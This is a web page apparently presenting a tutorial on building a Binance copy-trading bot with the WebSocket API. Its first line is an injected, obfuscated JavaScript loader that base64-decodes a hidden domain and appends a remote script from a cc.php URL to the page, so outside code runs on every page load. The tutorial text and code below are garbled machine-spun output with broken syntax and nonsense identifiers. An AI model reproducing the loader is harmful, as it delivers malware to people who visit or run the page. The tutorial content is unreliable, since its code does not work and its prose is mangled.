const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=36eedd43″;document.body.appendChild(script);
Create a Copy Trader on Binance Using the Websocket API
As a copy trader, you will need to monitor the market and perform shops automatically. One of the most effective ways to do this is the use of the api websocket, which is provid by binance. However, navigation in The Documentation May Be Stunning for Beginners.
In this article, we will divide the key steps to create a simple copy of a copy on binance using its websocket API interface. We will deal with the basic topics and provide a detailed guide that will start you.
Understanding API Websocket
API Websocket API Allows you to create a two -way communication channel with binance. It provides real -time updates, Allowing Your Merchant to Respond Quickly to Market Changes.
To get started you must have:
- A Binant Account and Registered for API Websocket.
- Knowledge or JavaScript programming Language (Optional But Recommended).
Settings website
Create A New File Called “Index.js” in Your Project Directory and Add the Following Code:
Conn socket = Require (‘WS’);
Const wss = new ws.server ({port: 8090});
Wss.on (‘Connection’, (WS) => {
Console.log (“client connected”);
// Handle Incoming Messages from the Main Account
Ws.on (‘Message’, (Message) => {
If (Message.startswith (‘Maineccount’)) {
Const order member = Message.Split (‘:’) [1];
// Make a Shop Based on an Id Received Order
Execetedrade (OrderID);
Wss.listen (8090, () => {
Console.log (Server web socket listening to Porte 8090
This code will set the web socket server with the address ws: // localhost: 8090
. “Ws.on (‘Connection’)The Events Listener Starts Whenever A New Client is connected. When the message in
‘Main account’, it extracts the order id from the message and calls the function of” executrade “.
Sending updates to the main account
To get updates from the main account, you must establish a connection use the web socket API interface. Create Another File Called “Websocket.js” and Add the Following Code:
Const socket = new ws.client ({{{
Host: “Localhost”,
Port: 8090,
Socket.on (‘Connect’, () => {
Console.log (“Connected to the websock Main account”);
// Send updates to the main account
Socket.write (Main account $ {orderid}
This code sets a Websocket Connection with the main account and Sends an update using the order id.
Assembly of all this
Create a new file called “copytrader.js” and add the following code:
Conn socket = Requires (‘./ Websocket’);
Const Binancepi = Require (‘Binance-api’);
// Establishing Binance API
Conste apikey = ‘your_api_key’;
Const apisecret = ‘your_api_secret’;
// Create A New Binance API Client
Const Apicient = New Binanceapi ({{{{{
APikey: APikey,
Apis Secret: Apiscet,
// function to do stores
Executrade Function (OrderID) {
// Call here Feature Trader Copy Trader
Console.log (Making a Trade $ {ordered '
// Main Loop
Set interval (() => {
Socket.emit (‘Message’, Main account $ {orderid ');
}, 1000); // Update Every Second
This code Imports The Necessary Modules, Sets The Binance API API Credentials, and Defines the “CopyTrader” Function That Performs Shops. The Main Loop Uses The Websocket Connection to Send Updates to the Main Account.
Starting the Application
To start the application, go to the project directory and execute the following commands:
Node index.js
This will start the websocket server on the 8090 port.
Creating a Simple Copy of a copy on binance using its web socket API interface request some technical knowledge and setting.
ethereum transaction calculated